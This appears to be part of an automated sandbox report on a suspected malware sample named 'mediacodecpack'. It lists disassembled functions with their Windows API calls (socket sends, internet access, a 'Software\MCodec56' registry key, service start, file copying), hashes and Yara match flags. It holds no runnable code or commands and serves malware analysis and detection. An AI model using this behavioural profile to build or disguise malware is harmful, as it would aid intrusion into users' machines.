                                                                                              • Part of subcall function 02D42420: InterlockedExchange.KERNEL32(?,00000001), ref: 02D42469
                                                                                              • Part of subcall function 02D42420: RtlLeaveCriticalSection.NTDLL(?), ref: 02D42470
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Interlocked$CriticalExchangeSection$CompareCompletionEnterIncrementLeavePostQueuedStatus
                                                                                            • String ID:
                                                                                            • API String ID: 1601054111-0
                                                                                            • Opcode ID: a6c0cdc9d7fe45b02db159afe9ad5435df034e7dab67e61b1ca5cf769a767afc
                                                                                            • Instruction ID: 75539e92f42f2e8c60ef1cbdb8b62d1e20c8a1169f21e739f01541fdd3f7beda
                                                                                            • Opcode Fuzzy Hash: a6c0cdc9d7fe45b02db159afe9ad5435df034e7dab67e61b1ca5cf769a767afc
                                                                                            • Instruction Fuzzy Hash: B411E3B5500209ABDF219F18DC89FAA3BA9EF44354F204556FE96CA390CF74DC60CBA4
                                                                                            APIs
                                                                                            • __beginthreadex.LIBCMT ref: 02D51116
                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,00000002,02D4998D,00000000), ref: 02D51147
                                                                                            • ResumeThread.KERNELBASE(?,?,?,?,?,00000002,02D4998D,00000000), ref: 02D51155
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseHandleResumeThread__beginthreadex
                                                                                            • String ID:
                                                                                            • API String ID: 1685284544-0
                                                                                            • Opcode ID: 681607191bdcd1bc299403dcee6253d375754d5bbc5e8309c63f73bad7df1da5
                                                                                            • Instruction ID: ab29b56209df4d0226879f2a124164167fcea33e22e51c7173e77d6d598d60be
                                                                                            • Opcode Fuzzy Hash: 681607191bdcd1bc299403dcee6253d375754d5bbc5e8309c63f73bad7df1da5
                                                                                            • Instruction Fuzzy Hash: AAF068712402209BEF209E6DDC84F9573E8EF59725F24055AF958D7380D7F1EC92DAA0
                                                                                            APIs
                                                                                            • InterlockedIncrement.KERNEL32(02D7529C), ref: 02D41ABA
                                                                                            • WSAStartup.WS2_32(00000002,00000000), ref: 02D41ACB
                                                                                            • InterlockedExchange.KERNEL32(02D752A0,00000000), ref: 02D41AD7
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Interlocked$ExchangeIncrementStartup
                                                                                            • String ID:
                                                                                            • API String ID: 1856147945-0
                                                                                            • Opcode ID: 319a0b355634630ee3a16eff674fd26043646c9042825168f9de3f600fbe473a
                                                                                            • Instruction ID: cca69746da385d066493b780368b6fbd9e5a7d1e6fd8517881afad385d61b314
                                                                                            • Opcode Fuzzy Hash: 319a0b355634630ee3a16eff674fd26043646c9042825168f9de3f600fbe473a
                                                                                            • Instruction Fuzzy Hash: 50D05E31D842046BE220A6A0BD0FA78776CD706712FD00651FDA9C43C0FB56AD6485B7
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D78000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D78000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d78000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: InternetOpen
                                                                                            • String ID: U[6
                                                                                            • API String ID: 2038078732-2089642770
                                                                                            • Opcode ID: 74da67eaa6ebd9f137a0526b111bac0b6f96ce9a99c4b638681b4f9a7c64e92d
                                                                                            • Instruction ID: 6b2254798370ccc988f216abcc2e3bde10454e51875f21c49ea57f50c2e2faf8
                                                                                            • Opcode Fuzzy Hash: 74da67eaa6ebd9f137a0526b111bac0b6f96ce9a99c4b638681b4f9a7c64e92d
                                                                                            • Instruction Fuzzy Hash: FC514FB260C600AFE7156F19ECC5BBAFBE9EF98320F06092DE7D583700D63558548A97
                                                                                            APIs
                                                                                            • GetStartupInfoA.KERNEL32(0040BC70), ref: 0040D55C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2733375841.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2733375841.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: InfoStartup
                                                                                            • String ID: 3h
                                                                                            • API String ID: 2571198056-227859408
                                                                                            • Opcode ID: 024e0850f827c435b8a5028a910d45a29312e1de5a17c3597f685f170630041f
                                                                                            • Instruction ID: 03e41e0e2fbe8f3f1350c05a2512de981e85b09ededd3a12d9f5b7d8ff28fd69
                                                                                            • Opcode Fuzzy Hash: 024e0850f827c435b8a5028a910d45a29312e1de5a17c3597f685f170630041f
                                                                                            • Instruction Fuzzy Hash: 604117B1908246CBD7149B68DE313E677B0E702321F14423E9553B31E2D77C444AEB5E
                                                                                            APIs
                                                                                            • RegCreateKeyExA.KERNELBASE(80000002,Software\MCodec56,00000000), ref: 0040DC43
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2733375841.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2733375841.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: Create
                                                                                            • String ID: Software\MCodec56
                                                                                            • API String ID: 2289755597-4241566752
                                                                                            • Opcode ID: f87b7628d3f1b6c01b43e6fa8910d4b250f6bb28f3b3560bcda25592cc6c599b
                                                                                            • Instruction ID: 93077888e0bbcd1fcb5d665c645348ae1621a215fb68b31d801dbfa4ad4509b8
                                                                                            • Opcode Fuzzy Hash: f87b7628d3f1b6c01b43e6fa8910d4b250f6bb28f3b3560bcda25592cc6c599b
                                                                                            • Instruction Fuzzy Hash: 2CD0A931A9C20AB8F2002A924D0EB721514B708B94F60083B2452B30C6C2B8844BD25B
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2733375841.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2733375841.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: Close
                                                                                            • String ID: MediaCodecPack
                                                                                            • API String ID: 3535843008-199385074
                                                                                            • Opcode ID: d1c8d0ac3f500a16e2a1ba87aa97279d6ff8767d919a51834699a3c776ea22fd
                                                                                            • Instruction ID: f19db8fe7a91f9339945a850f06442911a31ce16223db01261e704d0ab5d2cd6
                                                                                            • Opcode Fuzzy Hash: d1c8d0ac3f500a16e2a1ba87aa97279d6ff8767d919a51834699a3c776ea22fd
                                                                                            • Instruction Fuzzy Hash: B4B01221A4C510D7E5282BD05B09D6E34015544720732003B7683391E34FFD040B73EF
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02D44BF2
                                                                                              • Part of subcall function 02D41BA7: __EH_prolog.LIBCMT ref: 02D41BAC
                                                                                              • Part of subcall function 02D41BA7: RtlEnterCriticalSection.NTDLL ref: 02D41BBC
                                                                                              • Part of subcall function 02D41BA7: RtlLeaveCriticalSection.NTDLL ref: 02D41BEA
                                                                                              • Part of subcall function 02D41BA7: RtlEnterCriticalSection.NTDLL ref: 02D41C13
                                                                                              • Part of subcall function 02D41BA7: RtlLeaveCriticalSection.NTDLL ref: 02D41C56
                                                                                              • Part of subcall function 02D4D0FC: __EH_prolog.LIBCMT ref: 02D4D101
                                                                                              • Part of subcall function 02D4D0FC: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D4D180
                                                                                            • InterlockedExchange.KERNEL32(?,00000000), ref: 02D44CF2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$H_prolog$EnterExchangeInterlockedLeave
                                                                                            • String ID:
                                                                                            • API String ID: 1927618982-0
                                                                                            • Opcode ID: 71433e242f401b3064b9ccc4d83d63b46ab37b7d34f154bf4ed2e4f92919344c
                                                                                            • Instruction ID: 4ab88320fc124bc39eb0e14493d58532201a9c776593b30aa0e6bd51c08a2244
                                                                                            • Opcode Fuzzy Hash: 71433e242f401b3064b9ccc4d83d63b46ab37b7d34f154bf4ed2e4f92919344c
                                                                                            • Instruction Fuzzy Hash: 29510571D04248DFDB15DFA8C485AEEBBB5EF18314F24819AE905AB351EB709E44CF60
                                                                                            APIs
                                                                                            • WSASetLastError.WS2_32(00000000), ref: 02D42D47
                                                                                            • WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 02D42D5C
                                                                                              • Part of subcall function 02D4950D: WSAGetLastError.WS2_32(00000000,?,?,02D42A51), ref: 02D4951B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$Send
                                                                                            • String ID:
                                                                                            • API String ID: 1282938840-0
                                                                                            • Opcode ID: a9a2c466d591c41936d6ea93cb07a4f464fbc7b48a7f79345c5f09243c5bb694
                                                                                            • Instruction ID: 5e90164b0efc144c64a247a21514934d4d518dbf5b9674f274e80e4268935d43
                                                                                            • Opcode Fuzzy Hash: a9a2c466d591c41936d6ea93cb07a4f464fbc7b48a7f79345c5f09243c5bb694
                                                                                            • Instruction Fuzzy Hash: 6C0184B5900205EFD7205F95D85896BBBEDEF453A4B20052EF89983300DF749D40CBB1
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2733375841.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2733375841.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseValue
                                                                                            • String ID:
                                                                                            • API String ID: 3132538880-0
                                                                                            • Opcode ID: 8d1ffd4e1db30a3de41eb7b4220ffc1c9475fd541d97c53cfaeaf051eb009d7e
                                                                                            • Instruction ID: 4c22f98cd7c9e98f077693477baae5e06b4a06b3414cbbd33dac7c18dcee98c1
                                                                                            • Opcode Fuzzy Hash: 8d1ffd4e1db30a3de41eb7b4220ffc1c9475fd541d97c53cfaeaf051eb009d7e
                                                                                            • Instruction Fuzzy Hash: 34018C7541A5918FC709CB24AFB06A93FB5D64A740705107DD1D6AB273D6384C05EB1D
                                                                                            APIs
                                                                                            • StartServiceCtrlDispatcherA.ADVAPI32(?), ref: 0040DF4C
                                                                                            • lstrcmpiW.KERNELBASE(?,/chk), ref: 0040E028
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2733375841.000000000040B000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2733375841.0000000000400000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: CtrlDispatcherServiceStartlstrcmpi
                                                                                            • String ID: /chk
                                                                                            • API String ID: 369133424-3837807730
                                                                                            • Opcode ID: bf94812ca6c332d091ad4b42a885db31f7de2e204c73ca7d6ec59c21a7b81bd2
                                                                                            • Instruction ID: 9673a0ded5c8b983d3e052be02671165733424ab24c3791a3204680fb7a92e49
                                                                                            • Opcode Fuzzy Hash: bf94812ca6c332d091ad4b42a885db31f7de2e204c73ca7d6ec59c21a7b81bd2
                                                                                            • Instruction Fuzzy Hash: 1DF02434A08356DFDB058BA089146967BB4FB02310B0580FFC486EA197C7388806DF49
                                                                                            APIs
                                                                                            • WSASetLastError.WS2_32(00000000), ref: 02D4740B
                                                                                            • shutdown.WS2_32(?,00000002), ref: 02D47414
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorLastshutdown
                                                                                            • String ID:
                                                                                            • API String ID: 1920494066-0
                                                                                            • Opcode ID: 60307ac0010e4b94ffdd87a6c6803410110f119c989d1e0f3b83b2f8f603ea72
                                                                                            • Instruction ID: b933761e7ef3e5828bc86961d5181e3d85f69a6c19e17adf0c8c6b3290a705c1
                                                                                            • Opcode Fuzzy Hash: 60307ac0010e4b94ffdd87a6c6803410110f119c989d1e0f3b83b2f8f603ea72
                                                                                            • Instruction Fuzzy Hash: 1AF0B435A043148FD7109F64D414B5ABBE5EF09324F81881DEDA997380DB30AC10CBA1
                                                                                            APIs
                                                                                            • HeapCreate.KERNELBASE(00000000,00001000,00000000,00402A7F,00000000), ref: 00403B75
                                                                                              • Part of subcall function 00403A1C: GetVersionExA.KERNEL32 ref: 00403A3B
                                                                                            • HeapDestroy.KERNEL32 ref: 00403BB4
                                                                                              • Part of subcall function 00403F3B: HeapAlloc.KERNEL32(00000000,00000140,00403B9D,000003F8), ref: 00403F48
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2733375841.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2733375841.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: Heap$AllocCreateDestroyVersion
                                                                                            • String ID:
                                                                                            • API String ID: 2507506473-0
                                                                                            • Opcode ID: 41655e9e9c0e703031797a4b7b8f832f06af8b7de0b6b38e25141203e3b9edaa
                                                                                            • Instruction ID: 13181fdbc77bd6b5762d4953551df96dffaf81345f3f43d3ea23e6f05a00c699
                                                                                            • Opcode Fuzzy Hash: 41655e9e9c0e703031797a4b7b8f832f06af8b7de0b6b38e25141203e3b9edaa
                                                                                            • Instruction Fuzzy Hash: 58F065706547029ADB101F319E4572A3EA89B4075BF10447FFD00F51D1EFBC9784951D
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02D4511E
                                                                                              • Part of subcall function 02D43D7E: htons.WS2_32(?), ref: 02D43DA2
                                                                                              • Part of subcall function 02D43D7E: htonl.WS2_32(00000000), ref: 02D43DB9
                                                                                              • Part of subcall function 02D43D7E: htonl.WS2_32(00000000), ref: 02D43DC0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: htonl$H_prologhtons
                                                                                            • String ID:
                                                                                            • API String ID: 4039807196-0
                                                                                            • Opcode ID: 650fde095a4c6ed01d54af01b1aa7a5020bc64dc86b95703873e00d4745b0373
                                                                                            • Instruction ID: bf9fff989b2e95ddf6851aa121bd9bcaadf98a8db20250d3fd39563032316dc3
                                                                                            • Opcode Fuzzy Hash: 650fde095a4c6ed01d54af01b1aa7a5020bc64dc86b95703873e00d4745b0373
                                                                                            • Instruction Fuzzy Hash: E1811475D0424A8FCF05DFA9E190AEEBBB5EF48214F14819AD850B7240EB755A05CF74
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02D4D9CA
                                                                                              • Part of subcall function 02D41A01: TlsGetValue.KERNEL32 ref: 02D41A0A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: H_prologValue
                                                                                            • String ID:
                                                                                            • API String ID: 3700342317-0
                                                                                            • Opcode ID: 9a3da48241834c4d333d70f4211d0712ec45f8f69124b14b54c132ece339a3f9
                                                                                            • Instruction ID: e7b2c3721e85d321af909b6c8a9587f594e51aa991ca4f424b81351b5c72972b
                                                                                            • Opcode Fuzzy Hash: 9a3da48241834c4d333d70f4211d0712ec45f8f69124b14b54c132ece339a3f9
                                                                                            • Instruction Fuzzy Hash: DE212FB1908209AFDB04DFA5D445AFEBBFAEF58314F10416EE914A7340DB71AE01CBA1
                                                                                            APIs
                                                                                            • SHGetSpecialFolderPathA.SHELL32 ref: 02D7C5AF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D78000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D78000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d78000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: FolderPathSpecial
                                                                                            • String ID:
                                                                                            • API String ID: 994120019-0
                                                                                            • Opcode ID: 44b9785c920139eb1859e8cef98fc9cbd4dcb45f9793f254ae477e03cf835183
                                                                                            • Instruction ID: 139f3c5693b7d8f93f0de1f32a8f230d5a4ca751c776f825686c1be8315ed3db
                                                                                            • Opcode Fuzzy Hash: 44b9785c920139eb1859e8cef98fc9cbd4dcb45f9793f254ae477e03cf835183
                                                                                            • Instruction Fuzzy Hash: 30116AF250C504AFE705AE08EC85ABEBBE9EB94720F16482DE2C9C7300E63598518B52
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02D4D55A
                                                                                              • Part of subcall function 02D426DB: RtlEnterCriticalSection.NTDLL(?), ref: 02D42706
                                                                                              • Part of subcall function 02D426DB: CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 02D4272B
                                                                                              • Part of subcall function 02D426DB: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02D63173), ref: 02D42738
                                                                                              • Part of subcall function 02D426DB: SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 02D42778
                                                                                              • Part of subcall function 02D426DB: RtlLeaveCriticalSection.NTDLL(?), ref: 02D427D9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                                                            • String ID:
                                                                                            • API String ID: 4293676635-0
                                                                                            • Opcode ID: a02833ebcba285ee81ea6a348b57246392a67a70de103b045462c888e11894a7
                                                                                            • Instruction ID: cb161b5393d03e4b9cdba692c620f0879311f761a308fa8b937467ea2efd3bc9
                                                                                            • Opcode Fuzzy Hash: a02833ebcba285ee81ea6a348b57246392a67a70de103b045462c888e11894a7
                                                                                            • Instruction Fuzzy Hash: 12019EB1910B489FC328CF1AC548996FBE5EF88314B15C5AF98499B722E771AA40CF94
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2733375841.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2733375841.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: LibraryLoad
                                                                                            • String ID:
                                                                                            • API String ID: 1029625771-0
                                                                                            • Opcode ID: 81c2b33cd779f3770bbade04ffdf75582417cc2f6e97285ea47be6d284f00c90
                                                                                            • Instruction ID: 93b9b1974ed41d96b605e6f2543649dec7ed103e9ca7e63d5c00ca61ae8303bf
                                                                                            • Opcode Fuzzy Hash: 81c2b33cd779f3770bbade04ffdf75582417cc2f6e97285ea47be6d284f00c90
                                                                                            • Instruction Fuzzy Hash: C701EF71E10219CFDB08DF98D8A1AEDB3B1FB09300F55856AE452B72A0C738A848CB15
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02D4D339
                                                                                              • Part of subcall function 02D527C5: _malloc.LIBCMT ref: 02D527DD
                                                                                              • Part of subcall function 02D4D555: __EH_prolog.LIBCMT ref: 02D4D55A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: H_prolog$_malloc
                                                                                            • String ID:
                                                                                            • API String ID: 4254904621-0
                                                                                            • Opcode ID: b974d6a02fddba8dabc2bfe8b6350284e7bc602e211dc94a327368109b57cdd4
                                                                                            • Instruction ID: 807076c1ff253dfd25a8423925e3afb4f51fd4d14912e8430d4c05e8825d491f
                                                                                            • Opcode Fuzzy Hash: b974d6a02fddba8dabc2bfe8b6350284e7bc602e211dc94a327368109b57cdd4
                                                                                            • Instruction Fuzzy Hash: 72E08C71A04109ABEB19EF68D81973D77A2EB44704F0045AEAC09A2340EF729D10CA20
                                                                                            APIs
                                                                                              • Part of subcall function 02D548CA: __getptd_noexit.LIBCMT ref: 02D548CB
                                                                                              • Part of subcall function 02D548CA: __amsg_exit.LIBCMT ref: 02D548D8
                                                                                              • Part of subcall function 02D524A3: __getptd_noexit.LIBCMT ref: 02D524A7
                                                                                              • Part of subcall function 02D524A3: __freeptd.LIBCMT ref: 02D524C1
                                                                                              • Part of subcall function 02D524A3: RtlExitUserThread.NTDLL(?,00000000,?,02D52483,00000000), ref: 02D524CA
                                                                                            • __XcptFilter.LIBCMT ref: 02D5248F
                                                                                              • Part of subcall function 02D57954: __getptd_noexit.LIBCMT ref: 02D57958
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: __getptd_noexit$ExitFilterThreadUserXcpt__amsg_exit__freeptd
                                                                                            • String ID:
                                                                                            • API String ID: 1405322794-0
                                                                                            • Opcode ID: 8ceaf16a77eba51b27749d4e1da3199ea28528d8e8f3ba2a1189d110405cf3d7
                                                                                            • Instruction ID: fabfe9252de74fdd859be4453325c99e7b764d993aeeba3969716186b7170c02
                                                                                            • Opcode Fuzzy Hash: 8ceaf16a77eba51b27749d4e1da3199ea28528d8e8f3ba2a1189d110405cf3d7
                                                                                            • Instruction Fuzzy Hash: D0E0ECB1D146149FFF08ABA0E949F2D7B66EF44311F200189E9029B360DAB89D44DE31
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2733375841.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2733375841.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: CopyFile
                                                                                            • String ID:
                                                                                            • API String ID: 1304948518-0
                                                                                            • Opcode ID: 77cee4b6d02c89c83c6c8276e285ea2bf1f63efd6c688e4d25e383538686599e
                                                                                            • Instruction ID: ad16e0f938f8472db79b29402d126077d4e772f8cfe65a76779df96d21c81dee
                                                                                            • Opcode Fuzzy Hash: 77cee4b6d02c89c83c6c8276e285ea2bf1f63efd6c688e4d25e383538686599e
                                                                                            • Instruction Fuzzy Hash: 3AD0A7B548800EBDD708C6419D89EE9239CD708719F2000BB7249F30D0DE3849595A3D
                                                                                            APIs
                                                                                            • RegQueryValueExA.KERNELBASE(?), ref: 0040D57B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2733375841.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2733375841.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: QueryValue
                                                                                            • String ID:
                                                                                            • API String ID: 3660427363-0
                                                                                            • Opcode ID: edb662e5df4075614205ad4c2836f805a67019b38716de6e5ac022504569e8d8
                                                                                            • Instruction ID: 26b46432db68fc4713545f90ca74021cbfbc64d50c18903c1266e08affe4bc0b
                                                                                            • Opcode Fuzzy Hash: edb662e5df4075614205ad4c2836f805a67019b38716de6e5ac022504569e8d8
                                                                                            • Instruction Fuzzy Hash: 1BB092B0D48506EBCB014FA09D04A6DBA71BF44350722483A88A2B1160D7744105AA5A
                                                                                            APIs
                                                                                            • CreateDirectoryA.KERNELBASE ref: 00401E96
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2733375841.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2733375841.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateDirectory
                                                                                            • String ID:
                                                                                            • API String ID: 4241100979-0
                                                                                            • Opcode ID: 3de2052f2a00c726d227e4c4dd3299adb09deae8c3c4f630768cff51d50549a6
                                                                                            • Instruction ID: ac672658b327ef22b57dd8096845a6f62d9f9dd2f6b21eb8d4679538076b0d83
                                                                                            • Opcode Fuzzy Hash: 3de2052f2a00c726d227e4c4dd3299adb09deae8c3c4f630768cff51d50549a6
                                                                                            • Instruction Fuzzy Hash: 61A02220888330FBC0300AB00F0C8283008080838033200333A8B300C088FE080B2B8F
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2733375841.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2733375841.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExitProcess
                                                                                            • String ID:
                                                                                            • API String ID: 621844428-0
                                                                                            • Opcode ID: 6c15b7e0cb941e7360e5b59663fee49a32cbf71ae8a53d536831a9755e68f830
                                                                                            • Instruction ID: caaeb3edd0182b104b1465d8a7214e334b93cb3688170f1009fa56cc25eb67fe
                                                                                            • Opcode Fuzzy Hash: 6c15b7e0cb941e7360e5b59663fee49a32cbf71ae8a53d536831a9755e68f830
                                                                                            • Instruction Fuzzy Hash: D3A00221954A01AAE1407BB2EB0AB383910A725706F15417B7296790E18E79014A595F
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2733375841.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2733375841.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_400000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: CopyFile
                                                                                            • String ID:
                                                                                            • API String ID: 1304948518-0
